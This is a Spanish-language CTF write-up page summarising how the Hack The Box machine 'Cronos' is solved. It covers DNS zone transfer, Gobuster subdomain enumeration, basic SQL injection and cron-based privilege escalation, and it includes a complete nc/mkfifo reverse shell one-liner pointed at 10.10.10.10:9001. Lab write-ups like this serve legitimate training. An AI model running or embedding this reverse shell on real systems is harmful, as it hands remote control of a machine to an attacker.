xerosec
  • whoami
  • CTF Checklists
    • Enumeración inicial
    • Vectores de ataque
    • Escalada de privilegios
    • Active Directory
  • Writeups
    • YouTube - Walkthroughs en español
    • Hack The Box
      • Nibbles
      • Blocky
      • Irked
      • Traverxec
      • Cronos
      • Active
      • Devel
      • Chatterbox
      • Secnotes
    • TryHackMe
      • Hacking with Powershell
      • Enterprise
      • Chill Hack
      • Mr Robot CTF
      • Daily Bugle
      • Rootme
      • Attacktive Directory
      • Retro
  • Apuntes y recursos OSCP
    • Técnicas fundamentales
    • Linux
      • Linux Basics
      • Linux Privesc
    • Windows
      • Windows Basics
      • Windows Privesc
      • Ataques MITM
      • Enumeración Post-Explotación
      • Ataques Post-Explotación
  • Recursos
    • Plataformas de aprendizaje
Con tecnología de GitBook
En esta página
  • Resumen de la resolución
  • Habilidades adquiridas
  • Comandos y herramientas destacables
  • Walkthrough en YouTube:
  1. Writeups
  2. Hack The Box

Cronos

Resumen de la resolución

  • Enumeración de servicio DNS expuesto con nslookup y dig

  • Enumeración de rutas http y subdominios con Gobuster

  • Explotación SQLi básica

  • Reverse shell explotando vulnerabilidad RCE

  • Escalada de privilegios abusando de script php corriendo como tarea Cron en la máquina víctima

Habilidades adquiridas

  • Enumeración de Name Servers con nslookup

nslookup
server <IP>
<IP>
  • Ataque de transferencia de Zona DNS para enumerar subdominios

dig axfr @<IP> <dominio.tld>

Comandos y herramientas destacables

  • Enumeración de subdominios con Gobuster

gobuster vhost -u http://<dominio.tld> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 --no-error
  • Reverse Shell nc mkfifo

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 9001 >/tmp/f

Walkthrough en YouTube:

AnteriorTraverxecSiguienteActive

Última actualización hace 1 año